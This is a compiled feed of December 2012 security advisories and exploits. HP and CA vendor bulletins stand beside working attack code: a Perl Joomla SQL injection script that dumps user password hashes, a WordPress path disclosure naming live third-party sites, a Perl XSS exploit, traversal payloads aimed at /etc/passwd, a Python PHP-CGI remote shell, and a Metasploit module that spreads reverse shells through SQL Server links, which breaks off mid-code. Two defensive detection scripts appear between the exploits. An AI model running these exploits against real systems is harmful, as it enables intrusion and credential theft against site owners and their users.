HP-UX Running BIND, Remote Domain Name Revalidation



Note: the current version of the following document is available here:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03577598

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03577598
Version: 1

HPSBUX02835 SSRT100763 rev.1 - HP-UX Running BIND, Remote Domain Name
Revalidation

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2012-12-18
Last Updated: 2012-12-18

Potential Security Impact: Remote domain name revalidation

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP-UX running
BIND. This vulnerability could be exploited remotely, resulting in domain name
revalidation.

References: CVE-2012-1033

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.31 running BIND 9.7.3 prior to C.9.7.3.1.0
HP-UX B.11.23 and B.11.11 running BIND 9.3 prior to C.9.3.2.13.0
HP-UX B.11.31 running BIND 9.3 prior to C.9.3.2.15.0
HP-UX B.11.11 running BIND 9.2.0 prior to B.11.00.01.004
HP-UX B.11.23 running BIND 9.2.0 without patch PHNE_43369

BACKGROUND

CVSS 2.0 Base Metrics
===========================================================
Reference        Base Vector                     Base Score
CVE-2012-1033    (AV:N/AC:L/Au:N/C:N/I:P/A:N)    5.0
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP has provided updated versions of the BIND service to resolve this
vulnerability.
These upgrades are available from the following location
https://h20392.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber=BIND

BIND 9.7.3 for HP-UX
HP-UX Release          Depot Name
B.11.31 (PA and IA)    HPUX-NameServer_C.9.7.3.1.0_HP-UX_B.11.31_IA_PA.depot

BIND 9.3.2 for HP-UX
HP-UX Release          Depot Name
B.11.11 (PA and IA)    DNSUPGRADE_C.9.3.2.13.0_HP-UX_B.11.11_32_64.depot
B.11.23 (PA and IA)    DNSUPGRADE_C.9.3.2.13.0_HP-UX_B.11.23_IA_PA.depot
B.11.31 (PA and IA)    HPUX-NameServer_C.9.3.2.15.0_HP-UX_B.11.31_IA_PA.depot

MANUAL ACTIONS: Yes - Update
Download and install the software update

PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application
that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins
issued by HP and lists recommended actions that may apply to a specific HP-UX
system. It can also download patches and create a depot automatically. For
more information see: https://www.hp.com/go/swa

The following text is for use by the HP-UX Software Assistant.

AFFECTED VERSIONS

For BIND 9.7.3
HP-UX B.11.31
==================
NameService.BIND-AUX
NameService.BIND-RUN
action: install revision C.9.7.3.1.0 or subsequent

For BIND 9.3.2
HP-UX B.11.11
==================
BindUpgrade.BIND-UPGRADE
action: install revision C.9.3.2.13.0 or subsequent

HP-UX B.11.23
==================
BindUpgrade.BIND-UPGRADE
BindUpgrade.BIND2-UPGRADE
action: install revision C.9.3.2.13.0 or subsequent

HP-UX B.11.31
==================
NameService.BIND-AUX
NameService.BIND-RUN
action: install revision C.9.3.2.15.0 or subsequent

For BIND 9.2.0

HP-UX B.11.11
==================
BINDv920.INET-SVCS-BIND
action: install revision B.11.00.01.004 or subsequent

HP-UX B.11.23
==================
InternetSrvcs.INETSVCS-INETD
InternetSrvcs.INETSVCS-RUN
InternetSrvcs.INETSVCS2-RUN
action: install patch PHNE_43369 or subsequent

END AFFECTED VERSIONS

HISTORY
Version: 1 (rev.1) - 18 December 2012 - Initial release

Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert () hp com

Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-alert () hp com

Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin List: A list of HP Security Bulletins, updated
periodically, is contained in HP Security Notice HPSN-2011-001:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c02964430

Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX

Copyright 2012 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for
incidental, special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners.


Joomla Component com_movm SQL Injection Exploit (perl)


#!/usr/bin/perl
#Exploit Title: Joomla com_movm SQL Injection exploit
#Dork: inurl:"index.php?option=com_movm"
#Date: 24/12/2012
#Exploit Author: D35m0nd142
#Vendor Homepage: http://www.joomla.org
#Tested on Ubuntu 12.04
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;
system("clear");
print "***************************************************\n";
print "* Joomla Component com_movm SQL Injection exploit *\n";
print "*            Created by D35m0nd142                *\n";
print "***************************************************\n\n";
sleep 1;
print "Enter target --> ";
sleep 1;
chomp(my $target = <STDIN>);
# Prepend the scheme if the user typed a bare host name
if($target !~ /http:\/\//)
{
$target = "http://$target";
}
my $agent = LWP::UserAgent->new();
my $host = $target."/index.php?option=com_movm&controller=product&task=product&id=999999'+UNION+ALL+SELECT+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2Cgroup_concat(username,0x3a,password)+FROM+jos_users--+";
my $resp = $agent->request(HTTP::Request->new(GET=>$host));
my $content = $resp->content;
# Look for a 32-character hex string (an MD5 hash) in the response body
if ($content =~/([0-9a-fA-F]{32})/){
print "[+] Password found --> $1\n\n";
sleep 1;
}
else
{
print "No password found .\n";
}




//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information


Wordpress Themes grou-random-image-widget Full Path Disclosure


-------------------------------------------------------------------------------
Wordpress Themes- grou-random-image-widget Full Path Disclosure vulnerability
-------------------------------------------------------------------------------

#####
# Author => Zikou-16
#
# Facebook => http://fb.me/Zikou.se
#
# Google Dork => inurl:"wp-content/plugins/grou-random-image-widget"
#
# Tested on : Windows 7 , Backtrack 5r3
####

------------------------------
#=> Demos :

http://tjvl.fr/wp-content/plugins/grou-random-image-widget/g-random-img.php

http://www.vivre-musique-classique.fr/wp-content/plugins/grou-random-image-widget/g-random-img.php

http://www.bougeons-dans-la-region.fr/wp-content/plugins/grou-random-image-widget/g-random-img.php

http://www.fel.asso.fr/wp-content/plugins/grou-random-image-widget/g-random-img.php

http://wildearthprograms.org/wp-content/plugins/grou-random-image-widget/g-random-img.php

------------------------------





CA IdentityMinder Vulnerabilities


CA20121220-01: Security Notice for CA IdentityMinder



CA Technologies Support is alerting customers to two potential risks in CA
IdentityMinder (formerly known as CA Identity Manager). Two vulnerabilities
exist that can allow a remote attacker to execute arbitrary commands,
manipulate data, or gain elevated access. CA Technologies has issued
patches to address the vulnerabilities.

The first vulnerability, CVE-2012-6298, allows a remote attacker to execute
arbitrary commands or manipulate data.

The second vulnerability, CVE-2012-6299, allows a remote attacker to gain
elevated access.


Risk Rating

High


Affected Platforms

All


Affected Products

CA IdentityMinder r12.0 CR16 and earlier
CA IdentityMinder r12.5 SP1 through SP14
CA IdentityMinder r12.6 GA


Non-Affected Products

None (i.e. all supported versions of CA IdentityMinder are vulnerable)


How to determine if the installation is affected

All versions of CA IdentityMinder r12.0, r12.5 prior to SP15, and r12.6 GA
are vulnerable.

You can confirm that patches have been successfully applied by checking the
dates associated with the following IdentityMinder jar files: imsapi6.jar
and ims.jar. The dates on these jars will be set to the dates on which the
patch was applied.


Solution

CA Technologies has issued the following patches to address the
vulnerabilities. Download the appropriate patch(es) and follow the
instructions in the readme.txt file. These patches can be applied to all
operating system platforms.

12.0CR8+ - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/120CR8+.zip

12.5SP1 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP1.zip

12.5SP2 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP2.zip

12.5SP3 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP3.zip

12.5SP4 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP4.zip

12.5SP5 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP5.zip

12.5SP6 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP6.zip

12.5SP7 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP7.zip

12.5SP8 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP8.zip

12.5SP9 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP9.zip

12.5SP10 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP10.zip

12.5SP11 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP11.zip

12.5SP12 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP12.zip

12.5SP13 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP13.zip

12.5SP14 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP14.zip

12.6SP0 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/126GA.zip



Workaround

None


References

CVE-2012-6298 - CA IdentityMinder execute arbitrary commands or manipulate data
CVE-2012-6299 - CA IdentityMinder gain elevated access

CA20121220-01: Security Notice for CA IdentityMinder
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID={FBA53B61-3A68-4506-9876-F845F6DD8A93}


Acknowledgement

CVE-2012-6298 - Discovered internally by CA Technologies
CVE-2012-6299 - Discovered internally by CA Technologies


Change History

Version 1.0: Initial Release


If additional information is required, please contact CA Technologies
Support at https://support.ca.com/

If you discover a vulnerability in CA Technologies products, please report
your findings to the CA Technologies Product Vulnerability Response Team.
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782


Thanks and regards,
Ken Williams, Director
CA Technologies Product Vulnerability Response Team
CA Technologies Business Unit Operations
wilja22 () ca com


Copyright (C) 2012 CA. All Rights Reserved. One CA Plaza, Islandia, N.Y.
11749. All other trademarks, trade names, service marks, and logos
referenced herein belong to their respective companies.

Persistent XSS vulnerability in WP-UserOnline

In 2010 I disclosed multiple vulnerabilities (Cross-Site Scripting and
Full path disclosure) in the WordPress plugin WP-UserOnline,
and recently I disclosed the exploit for the persistent XSS vulnerability in WP-UserOnline.
It must be interesting for those who want to test this vulnerability.

Exploit:

http://websecurity.com.ua/uploads/2012/WP-UserOnline.txt

I developed this perl exploit on 26.04.2010.

As I wrote earlier, WP-UserOnline 2.62 and previous versions are
vulnerable. After I informed the developer, he released WP-UserOnline 2.70 (on
07.05.2010). In version 2.70 he fixed the XSS, but not the Full path disclosure
vulnerabilities.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua



Past Vulnerabilities
Hello 3APA3A! I am letting you know that I found Cross-Site Scripting and Full path disclosure vulnerabilities in the WP-UserOnline plugin for WordPress.

XSS: With a special request to the site an XSS attack can be carried out. For this you need to send a GET request in a special way (not from the browser) to the page http://site/?<script>alert(document.cookie)</script>. This is persistent XSS. The vulnerability shows up on the page http://site/wp-admin/index.php?page=wp-useronline.

Full path disclosure. WP-UserOnline 2.62 and earlier versions are vulnerable. In version WP-UserOnline 2.70 the author fixed the XSS, but not the Full path disclosure vulnerabilities.

More information about these vulnerabilities is on my site: http://websecurity.com.ua/4177/

Best wishes & Regards, MustLive, site administrator, http://websecurity.com.ua



This is persistent XSS. The vulnerability shows up on the page http://site/wp-admin/index.php?page=wp-useronline.

Full path disclosure:

http://site/wp-content/plugins/wp-useronline/admin.php

http://site/wp-content/plugins/wp-useronline/widget.php

http://site/wp-content/plugins/wp-useronline/wp-stats.php

http://site/wp-content/plugins/wp-useronline/wp-useronline.php

http://site/wp-content/plugins/wp-useronline/scb/Widget.php

http://site/wp-content/plugins/wp-useronline/scb/load.php

WP-UserOnline 2.62 and previous versions are vulnerable. In version WP-UserOnline 2.70 the author fixed the XSS, but not the Full path disclosure vulnerabilities.

More information about these vulnerabilities is on my site:
http://websecurity.com.ua/4177/





#!/usr/bin/perl
# Exploit for WP-UserOnline
# Copyright (C) MustLive 2010
# http://websecurity.com.ua
# Last update: 26.04.2010
use strict;
use warnings;
use IO::Socket;
##################################################
# Settings
##################################################
my $agent = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"; # User Agent
my $url = "http://site"; # URL
my $xss = "/?<script>alert(document.cookie)</script>"; # XSS
##################################################

my ($host,$sock,$content,$response);
$content = "";
$response = 0;

# Take the host part of the URL (everything after http:// up to the first slash)
if ($url =~ /http:\/\/([^\/]+)/) {
$host = $1;
}
else {
print "Bad URL: $url\n";
exit();
}
$sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "80");
if (!$sock) {
print "The Socket: $!\n";
exit();
}
# HTTP header lines end in CRLF
print $sock "GET $xss HTTP/1.1\r\n";
print $sock "Host: $host\r\n";
print $sock "User-Agent: $agent\r\n";
print $sock "Connection: close\r\n";
print $sock "\r\n";
while (<$sock>) {
$content .= $_;
}
print "$url - ";
# Pull the status code out of the status line, e.g. "HTTP/1.1 200 OK"
if ($content =~ /HTTP\/.\..\s+(\d+)/) {
$response = $1;
}
if ($response == 200 or $response == 400) {
print "OK\n";
}
else {
print "Error: $response\n";
}





Netransfers 2.1 XSS / LFI / Traversal


# Exploit Title: Netransfers V2.1 Multiple vulnerabilities
# Date: 19.12.2012
# Exploit Author: d3b4g
# Vendor Homepage: http://marioemoreno.com/netransfers-demo/
# Tested on: Windows 7
# Blog: d3b4g.me
 
 
---------------------------------------------------------------------






[1] Directory Traversal Vulnerability
------------------------------------

http://localhost/[path]/index.php?lang=invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.




[2] Local File Inclusion
-------------------

http://localhost/[path]/search.php?lang= [evil site]


[3] XSS
---------------


http://localhost/[path]/tours_step2.php?lang=espanol%27%22()&%%3CScRiPt%20%3Eprompt(xss)%3C/ScRiPt%3E





PHP-CGI Argument Injection Remote Code Execution


#!/usr/bin/python
import requests
import sys

print """
CVE-2012-1823 PHP-CGI Argument Injection Remote Code Execution
This exploit abuses an argument injection in the PHP-CGI wrapper
to execute code as the PHP user/webserver user.
Feel free to give me abuse about this <3
- infodox | insecurety.net | @info_dox
"""

if len(sys.argv) != 2:
    print "Usage: ./cve-2012-1823.py <target>"
    sys.exit(0)

target = sys.argv[1]
url = """http://""" + target + """/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input"""
lol = """<?php system('"""
lol2 = """');die(); ?>"""
print "[+] Connecting and spawning a shell..."
while True:
    try:
        bobcat = raw_input("%s:~$ " %(target))
        lulz = lol + bobcat + lol2
        hax = requests.post(url, lulz)
        print hax.text
    except KeyboardInterrupt:
        print "\n[-] Quitting"
        sys.exit(1)
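As an added defender-side example (not the exploit author's code), the following Python 3 script flags the argument-injection pattern this exploit relies on in web-server access logs: a query string with no literal "=" (which php-cgi handed to the interpreter as command-line options) that decodes to option tokens such as -d or -s. The sample log lines and the list of high-risk directives are constructed assumptions.

```python
"""Log check for CVE-2012-1823 style php-cgi argument injection.

Added example for this page (not the exploit author's code). php-cgi only
treated the query string as command-line arguments when it contained no
literal '=', so the exploit above encodes '=' as %3d; this script decodes
the query string before looking for option tokens, so that trick does not
hide the injected directives.
"""
import re
from urllib.parse import unquote_plus

# Request line inside a combined-format access log entry: "GET /target HTTP/1.1"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Directives whose injection turns the bug into code execution (assumed triage list)
HIGH_RISK_DIRECTIVES = {"allow_url_include", "auto_prepend_file", "auto_append_file",
                        "disable_functions", "open_basedir", "safe_mode"}

# Constructed sample log; addresses come from documentation ranges, not real hosts
SAMPLE_LOG = [
    '203.0.113.5 - - [24/Dec/2012:10:01:12 +0000] "POST /?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1" 200 512 "-" "python-requests/0.14"',
    '203.0.113.5 - - [24/Dec/2012:10:01:20 +0000] "GET /index.php?-s HTTP/1.1" 200 2048 "-" "curl/7.26.0"',
    '198.51.100.7 - - [24/Dec/2012:10:02:01 +0000] "GET /index.php?option=com_content&id=5 HTTP/1.1" 200 8192 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [24/Dec/2012:10:02:09 +0000] "GET /search.php?q=-d+foo HTTP/1.1" 200 100 "-" "Mozilla/5.0"',
]


def extract_options(target):
    """Return the php-cgi option tokens hidden in the request target, or [] if none.

    A literal '=' in the raw query string makes php-cgi treat it as an ordinary
    GET, so such requests are not argument injection even if they contain '-d'.
    """
    if "?" not in target:
        return []
    raw_query = target.split("?", 1)[1]
    if "=" in raw_query:
        return []
    tokens = unquote_plus(raw_query).split()   # '+' -> space, %3d -> '='
    if not tokens or not tokens[0].startswith("-"):
        return []
    return tokens


def injected_directives(tokens):
    """Collect '-d key=value' pairs (both '-d k=v' and '-dk=v' spellings) into a dict."""
    directives = {}
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        if tok == "-d" and i + 1 < len(tokens):
            key, _, value = tokens[i + 1].partition("=")
            directives[key] = value
            i += 2
            continue
        if tok.startswith("-d") and len(tok) > 2:
            key, _, value = tok[2:].partition("=")
            directives[key] = value
        i += 1
    return directives


def scan_log(lines):
    """Return one finding per suspicious line: line number, method, options, directives, risk."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        options = extract_options(match.group("target"))
        if not options:
            continue
        directives = injected_directives(options)
        findings.append({
            "line": number,
            "method": match.group("method"),
            "options": options,
            "directives": directives,
            "high_risk": bool(directives.keys() & HIGH_RISK_DIRECTIVES),
        })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        flag = "HIGH" if f["high_risk"] else "review"
        print(f"line {f['line']}: {f['method']} options={f['options']} [{flag}]")
```

A request such as ?-s (source disclosure) produces a finding with no directives, so review every hit rather than only the high-risk ones.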





Metasploit: Microsoft SQL Server Database Link Crawling Command Execution

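As an added example (not part of the Metasploit module that follows, nor of the framework), this Python 3 script triages the module's "Linked Server Table" loot offline: it rebuilds the link graph from rows in that table's column order, enumerates every working link chain from the entry server, and reports which servers a chain reaches through a sysadmin-privileged link login, the condition the module checks before it enables xp_cmdshell on a crawled server. The sample rows, server names, logins, and the "sysadmin"/"user" privilege values are constructed assumptions.

```python
"""Offline triage of the MSSQL link-crawling module's loot table.

Added example for this page, not part of the Metasploit module. Rows follow
the module's 'Linked Server Table' columns; the values in SAMPLE_ROWS are
constructed, and link_privilege is assumed to be 'sysadmin' or 'user'.
"""
from collections import defaultdict

COLUMNS = ["db_server", "db_version", "db_os", "link_server", "link_user",
           "link_privilege", "link_version", "link_os", "link_state"]

# Constructed sample loot: one entry server with two links, one nested link,
# one dead link and one link that points back at the entry server.
SAMPLE_ROWS = [
    ("SQLSRV01", "2008 R2", "Windows 2008", "SQLSRV02", "linksvc", "sysadmin", "2005", "Windows 2003", "up"),
    ("SQLSRV01", "2008 R2", "Windows 2008", "SQLSRV03", "reporting", "user", "2008", "Windows 2008", "up"),
    ("SQLSRV03", "2008", "Windows 2008", "SQLSRV04", "sa", "sysadmin", "2000", "Windows 2000", "up"),
    ("SQLSRV02", "2005", "Windows 2003", "SQLSRV05", "NA", "NA", "NA", "NA", "Connection Failed"),
    ("SQLSRV04", "2000", "Windows 2000", "SQLSRV01", "svc_etl", "sysadmin", "2008 R2", "Windows 2008", "up"),
]


def build_graph(rows):
    """Adjacency list of usable links: db_server -> [(link_server, link_user, link_privilege)]."""
    graph = defaultdict(list)
    for row in rows:
        r = dict(zip(COLUMNS, row))
        if r["link_state"] != "up":
            continue  # the crawler could not traverse this link, so it adds no reach
        graph[r["db_server"]].append((r["link_server"], r["link_user"], r["link_privilege"]))
    return graph


def crawl_paths(rows, start):
    """Every simple link path from `start`, keyed by the server it reaches.

    A server can be reached by several chains with different privilege, which
    is why the module keeps every link path per server rather than just one.
    """
    graph = build_graph(rows)
    found = defaultdict(list)

    def walk(node, path):
        for target, user, priv in graph.get(node, []):
            if target in path:
                continue  # link loops (e.g. a link back to the entry server) are not re-walked
            new_path = path + [target]
            found[target].append({"path": new_path, "login": user, "privilege": priv})
            walk(target, new_path)

    walk(start, [start])
    return dict(found)


def sysadmin_reachable(rows, start):
    """Servers on which at least one link chain lands with a sysadmin link login."""
    return sorted(server for server, hits in crawl_paths(rows, start).items()
                  if any(h["privilege"] == "sysadmin" for h in hits))


def broken_links(rows):
    """(db_server, link_server) pairs whose link the crawl could not use."""
    return [(r[0], r[3]) for r in rows if r[8] != "up"]


if __name__ == "__main__":
    for server, hits in crawl_paths(SAMPLE_ROWS, "SQLSRV01").items():
        for h in hits:
            print(f"{' -> '.join(h['path'])}  (login {h['login']}, {h['privilege']})")
    print("sysadmin via links:", sysadmin_reachable(SAMPLE_ROWS, "SQLSRV01"))
    print("dead links:", broken_links(SAMPLE_ROWS))
```

Each server listed by sysadmin_reachable is one whose link login should be re-mapped to a least-privilege account, since an ordinary login on the entry server inherits that login's rights over the chain.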
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##


require 'msf/core'
require 'msf/core/exploit/mssql_commands'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::MSSQL
  include Msf::Auxiliary::Report
  include Msf::Exploit::CmdStagerVBS

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft SQL Server Database Link Crawling Command Execution',
      'Description'    => %q{
          This module can be used to crawl MS SQL Server database links and deploy
        Metasploit payloads through links configured with sysadmin privileges using a
        valid SQL Server Login.

          If you are attempting to obtain multiple reverse shells using this module we
        recommend setting the "DisablePayloadHandler" advanced option to "true", and setting
        up a multi/handler to run in the background as a job to support multiple incoming
        shells.

          If you are interested in deploying payloads to specific servers this module also
        supports that functionality via the "DEPLOYLIST" option.

          Currently, the module is capable of delivering payloads to both 32bit and 64bit
        Windows systems via powershell memory injection methods based on Matthew Graeber's
        work. As a result, the target server must have powershell installed. By default,
        all of the crawl information is saved to a CSV formatted log file and MSF loot so
        that the tool can also be used for auditing without deploying payloads.
      },
      'Author'         =>
        [
          'Antti Rantasaari <antti.rantasaari[at]netspi.com>',
          'Scott Sutherland "nullbind" <scott.sutherland[at]netspi.com>'
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['URL', 'http://www.slideshare.net/nullbind/sql-server-exploitation-escalation-pilfering-appsec-usa-2012'],
          ['URL','http://msdn.microsoft.com/en-us/library/ms188279.aspx'],
          ['URL','http://www.exploit-monday.com/2011_10_16_archive.html']
        ],
      'Platform'       => 'win',
      'DisclosureDate' => 'Jan 1 2000',
      'Targets'        =>
        [
          [ 'Automatic', { } ],
        ],
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        OptBool.new('DEPLOY',       [false, 'Deploy payload via the sysadmin links', 'false']),
        OptString.new('DEPLOYLIST', [false,'Comma separated list of systems to deploy to']),
        OptString.new('PASSWORD',   [true, 'The password for the specified username'])
      ], self.class)

    register_advanced_options(
      [
        OptString.new('POWERSHELL_PATH', [true, 'Path to powershell.exe', "C:\\windows\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe"])
      ], self.class)
  end

  def exploit
    # Display start time
    time1 = Time.new
    print_status("-------------------------------------------------")
    print_status("Start time : #{time1.inspect}")
    print_status("-------------------------------------------------")

    # Check if credentials are correct
    print_status("Attempting to connect to SQL Server at #{rhost}:#{rport}...")

    if (not mssql_login_datastore)
      print_error("Invalid SQL Server credentials")
      print_status("-------------------------------------------------")
      return
    end

    # Define master array to keep track of enumerated database information
    masterList = Array.new
    masterList[0] = Hash.new      # Define new hash
    masterList[0]["name"] = ""      # Name of the current database server
    masterList[0]["db_link"] = ""    # Name of the linked database server
    masterList[0]["db_user"] = ""     # User configured on the database server link
    masterList[0]["db_sysadmin"] = ""  # Specifies if  the database user configured for the link has sysadmin privileges
    masterList[0]["db_version"] = ""  # Database version of the linked database server
    masterList[0]["db_os"] = ""      # OS of the linked database server
    masterList[0]["path"] = [[]]    # Link path used during crawl - all possible link paths stored
    masterList[0]["done"] = 0      # Used to determine if linked need to be crawled

    shelled = Array.new          # keeping track of shelled systems - multiple incoming sa links could result in multiple shells on one system

    # Setup query for gathering information from database servers
    versionQuery = "select @@servername,system_user,is_srvrolemember('sysadmin'),(REPLACE(REPLACE(REPLACE\
    (ltrim((select REPLACE((Left(@@Version,CHARINDEX('-',@@version)-1)),'Microsoft','')+ rtrim(CONVERT\
    (char(30), SERVERPROPERTY('Edition'))) +' '+ RTRIM(CONVERT(char(20), SERVERPROPERTY('ProductLevel')))+\
    CHAR(10))), CHAR(10), ''), CHAR(13), ''), CHAR(9), '')) as version, RIGHT(@@version, LEN(@@version)- 3 \
    -charindex (' ON ',@@VERSION)) as osver,is_srvrolemember('sysadmin'),(select count(srvname) from \
    master..sysservers where dataaccess=1 and srvname!=@@servername and srvproduct = 'SQL Server')as linkcount"

    # Create loot table to store configuration information from crawled database server links
    linked_server_table = Rex::Ui::Text::Table.new(
      'Header'  => 'Linked Server Table',
      'Ident'   => 1,
      'Columns' => ['db_server', 'db_version', 'db_os', 'link_server', 'link_user', 'link_privilege', 'link_version', 'link_os','link_state']
    )
    save_loot = ""

    # Start crawling through linked database servers
    while masterList.any? {|f| f["done"] == 0}
      # Find the first DB server that has not been crawled (not marked as done)
      server = masterList.detect {|f| f["done"] == 0}

      # Get configuration information from the database server
      sql = query_builder(server["path"].first,"",0,versionQuery)
      result = mssql_query(sql, false) if mssql_login_datastore
      parse_results = result[:rows]
      parse_results.each { |s|
        server["name"] = s[0]
        server["db_user"] = s[1]
        server["db_sysadmin"] = s[5]
        server["db_version"] =  s[3]
        server["db_os"] = s[4]
        server["numlinks"] = s[6]
      }
      if masterList.length == 1
        print_good("Successfully connected to #{server["name"]}")
        if datastore['VERBOSE'] == true
          show_configs(server["name"],parse_results,true)
        elsif server["db_sysadmin"] == 1
          print_good("Sysadmin on #{server["name"]}")
        end
      end
      if server["db_sysadmin"] == 1
        enable_xp_cmdshell(server["path"].first,server["name"],shelled)
      end

      # If links were found, determine if they can be connected to and add to crawl list
      if (server["numlinks"] > 0)
        # Enable loot
        save_loot = "yes"

        # Select a list of the linked database servers that exist on the current database server
        print_status("")
        print_status("-------------------------------------------------")
        print_status("Crawling links on #{server["name"]}...")
        # Display number db server links
        print_status("Links found: #{server["numlinks"]}")
